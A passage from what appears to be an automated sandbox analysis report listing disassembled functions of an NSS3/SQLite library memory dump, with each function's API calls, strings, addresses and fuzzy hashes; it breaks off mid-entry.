sqlite3_value_blob.NSS3(?,?), ref: 6CA7701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CA77052

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: c097597f5897823b7e6e639fc33112886bf185cd7212d5e2dd346b4e2098714f
Instruction ID: 7912813dfa459c45bbe23fb3c05e945d0bcc0106ad0eaeebdbe971840bd705e0
Opcode Fuzzy Hash: c097597f5897823b7e6e639fc33112886bf185cd7212d5e2dd346b4e2098714f
Instruction Fuzzy Hash: 4961D3B9E052468BDB11CFA8C9407EEB7B2BF45308F184169D815EB751E7329C5ACBB0

Function 6CACCA30 Relevance: 12.2, APIs: 8, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CACCA95
EnterCriticalSection.KERNEL32(00000000), ref: 6CACCAA9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6CACC8CF,?,?,?), ref: 6CACCAE7
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACCB09
PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6CACC8CF,?,?,?), ref: 6CACCB31

Part of subcall function 6CAC1490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6CACCB40,?,00000000), ref: 6CAC14A1
Part of subcall function 6CAC1490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6CACC8CF,?), ref: 6CAC14C7
Part of subcall function 6CAC1490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAC14E4
Part of subcall function 6CAC1490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6CAC14F5

PR_Unlock.NSS3(?), ref: 6CACCB97
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACCBB2
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CACC8CF), ref: 6CACCBE2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
String ID:
API String ID: 2753656479-0
Opcode ID: 979377940888a0cbede3d7f9012c8a151609181095d5e5cad7529695fabb3b06
Instruction ID: 9c6f1cc96c668322789c448a09606277fcbd0fb28f7357a29c84fe563fdb6894
Opcode Fuzzy Hash: 979377940888a0cbede3d7f9012c8a151609181095d5e5cad7529695fabb3b06
Instruction Fuzzy Hash: E1516175F001199FDB00DFA4D984AEEB7B9BF08358F184168E909A7701E735ED94CBA2

Function 6CAE8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CAE7313), ref: 6CAE8FBB

Part of subcall function 6CAE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA88298,?,?,?,6CA7FCE5,?), ref: 6CAE07BF
Part of subcall function 6CAE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAE07E6
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE081B
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE90F1

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CAE7313), ref: 6CAE906B

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CAE7313), ref: 6CAE9128

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 49032d198e7b5ffa3872aeca79a33ad791dcb71d4e0fbff2eeb798cdcc8b6a66
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: AA517E71A003018BEB50DF7ADE44BA6B3F9AF48318F194029D915D7B61EB31E884DBD1

Function 6CAC88E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAC88FC

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CAC8913

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CBAD864,?), ref: 6CAC8947

Part of subcall function 6CADE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6CADE245
Part of subcall function 6CADE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CADE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAC895B
DER_GetInteger_Util.NSS3(?), ref: 6CAC8973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAC8982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC89EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAC8A12

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: f1b58707a52330d4b8075d10ed59bbc0570c8e36360a68cde1983feccbdbc0c3
Instruction ID: 44eb042a151701b8abeb49800769c93263395b188fe47508daed87ac1c734805
Opcode Fuzzy Hash: f1b58707a52330d4b8075d10ed59bbc0570c8e36360a68cde1983feccbdbc0c3
Instruction Fuzzy Hash: 7C315BB1B0464057F72042B9AC417AE7295AF9132CF290737D929D7B91FB31D4CA8293

Function 6CA7AB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6CA7ABAF
GetLastError.KERNEL32 ref: 6CA7AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6CA7AC50

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA7AC62
CloseHandle.KERNEL32(?), ref: 6CA7AC75
CloseHandle.KERNEL32(?), ref: 6CA7AC7A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: 3e73c86c157ec7e88ea169777ae940d6e67a8b00ab0c9cecdffeb91483310419
Instruction ID: 94460a8845f15b0dc82cb86b4c1b3fd30090793a314b2165d131bbdb5537fd6e
Opcode Fuzzy Hash: 3e73c86c157ec7e88ea169777ae940d6e67a8b00ab0c9cecdffeb91483310419
Instruction Fuzzy Hash: F631A075A00215EFDB14DFA8D8449AEBBF5FF49308B248068D5099B361DB31EC45CBE1

Function 6CAA4E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAA4E90
EnterCriticalSection.KERNEL32 ref: 6CAA4EA9
TlsGetValue.KERNEL32 ref: 6CAA4EC6
EnterCriticalSection.KERNEL32 ref: 6CAA4EDF
PL_HashTableLookup.NSS3 ref: 6CAA4EF8
PR_Unlock.NSS3 ref: 6CAA4F05
PR_Now.NSS3 ref: 6CAA4F13
PR_Unlock.NSS3 ref: 6CAA4F3A

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 1ec2521ce0084b20537405ccf0e325fba5bd59241882f04731a4fdbd97254c3c
Instruction ID: 4c6a29b6abc18cf09000972af80b1735e71a0af2ccfa22a8ccd5de59a8968ed4
Opcode Fuzzy Hash: 1ec2521ce0084b20537405ccf0e325fba5bd59241882f04731a4fdbd97254c3c
Instruction Fuzzy Hash: 0A4148B4A04A058FCB00EF78D1848AABBF4FF49354B158669EC599B711EB30E895CBD1

Function 6CAA4A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CAA5385,?,?,00000000), ref: 6CAA4A29
EnterCriticalSection.KERNEL32 ref: 6CAA4A42
TlsGetValue.KERNEL32 ref: 6CAA4A5F
EnterCriticalSection.KERNEL32 ref: 6CAA4A78
PL_HashTableLookup.NSS3 ref: 6CAA4A91
PR_Unlock.NSS3 ref: 6CAA4A9E
PR_Now.NSS3 ref: 6CAA4AAD
PR_Unlock.NSS3 ref: 6CAA4AD2

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 4fcd6432dbfef509d084a61f34b8e51e6fd248f0b4908135076b9cb793397dd1
Instruction ID: e848a2234587f32c438632875c428da4dfcf9f1e95f89ad227cd02aa338c2291
Opcode Fuzzy Hash: 4fcd6432dbfef509d084a61f34b8e51e6fd248f0b4908135076b9cb793397dd1
Instruction Fuzzy Hash: 7A316BB5A04A148FCB10EF78D18446ABBF4FF09354B058A69EC99D7711EB30E895CBD1

Function 6CAA4BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CAAA6A2,?,?,00000000), ref: 6CAA4BB9
EnterCriticalSection.KERNEL32 ref: 6CAA4BD2
TlsGetValue.KERNEL32 ref: 6CAA4BEF
EnterCriticalSection.KERNEL32 ref: 6CAA4C08
PL_HashTableLookup.NSS3 ref: 6CAA4C21
PR_Unlock.NSS3 ref: 6CAA4C2E
PR_Now.NSS3 ref: 6CAA4C3D
PR_Unlock.NSS3 ref: 6CAA4C62

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 54a7065c82f67a00d05fc809772a1b15eca6ea05732a817bae55b7b67d8f02a9
Instruction ID: cde9adbf11cabf7e4c1273dfb09cdeb392365bc2c9bb434b9b04bff8b25caece
Opcode Fuzzy Hash: 54a7065c82f67a00d05fc809772a1b15eca6ea05732a817bae55b7b67d8f02a9
Instruction Fuzzy Hash: 2D3169B5A04A149FCB10EF78D18446ABBF4FF09354B058A69EC998B711EB30E895CBD1

Function 6CB90860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB9086C

Part of subcall function 6CB90930: EnterCriticalSection.KERNEL32(?,00000000,?,6CB90C83), ref: 6CB9094F
Part of subcall function 6CB90930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6CB90C83), ref: 6CB90974
Part of subcall function 6CB90930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90983
Part of subcall function 6CB90930: _PR_MD_UNLOCK.NSS3(?,?,6CB90C83), ref: 6CB9099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB9087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB90892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6CB9798A), ref: 6CB908AA
free.MOZGLUE(?,00000000,00000000,?,?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB908C7
free.MOZGLUE(?,00000000,00000000,?,?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB908E9
free.MOZGLUE(?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB908EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6CB97AE2,?,?,?,?,?,?,6CB9798A), ref: 6CB9090E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 1919794b2369698c28b2735fd7d8a426ad890c2e11d781dc27064d329828b10e
Instruction ID: 32cbe57c2431b0b8ec1d7c7ef887268fe347cfb022219c653ba5537ba9f2d33c
Opcode Fuzzy Hash: 1919794b2369698c28b2735fd7d8a426ad890c2e11d781dc27064d329828b10e
Instruction Fuzzy Hash: 7F11B6B1B012904FFF00AF68ED9574A3778EB8A79AF2C0135E40587641DB31E444CBD2

Function 6CA04F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA04FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA051BB

Strings

unable to delete/modify user-function due to active statements, xrefs: 6CA051DF
misuse, xrefs: 6CA051AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA051A5
%s at line %d of [%.10s], xrefs: 6CA051B4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 329141b6c5f3d62fce5246eed0cae18dd6806906063d8d89ca8760cb6f3a3578
Instruction ID: 0776e0bfcde92ee06a028894262d1e8de33d14e4d47ae4f980bf80ec6d2279ce
Opcode Fuzzy Hash: 329141b6c5f3d62fce5246eed0cae18dd6806906063d8d89ca8760cb6f3a3578
Instruction Fuzzy Hash: 2971AE75B0420A9FEB00CE15ED80B9E77B5BF4838CF184524ED099BA81D735EC91CBA5

Function 6CA72D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CA72D69

Strings

winUnmapfile2, xrefs: 6CA72F7F
winUnmapfile1, xrefs: 6CA72F55
winTruncate1, xrefs: 6CA72EBE
winTruncate2, xrefs: 6CA72EF8
winSeekFile, xrefs: 6CA72E9C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 47548c9ee31a9733abb5ab513a7a5acd2e49d6caa20bdc4c08ca3c43262dfc19
Instruction ID: 90e31056208a6676a0b7ba7cebd04a4a47a87a13d9c5404a83e44aa103bce250
Opcode Fuzzy Hash: 47548c9ee31a9733abb5ab513a7a5acd2e49d6caa20bdc4c08ca3c43262dfc19
Instruction Fuzzy Hash: EF61C079B00204DFDB54CF68D894AAE7BB1FB49354F148638E9069B780DB31AD46CBA1

Function 6CAF29E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6CAF21DD,00000000), ref: 6CAF2A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6CAF21DD,00000002,00000000,00000000,?,?,6CAF21DD,00000000), ref: 6CAF2A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6CAF21DD,00000000), ref: 6CAF2A8E
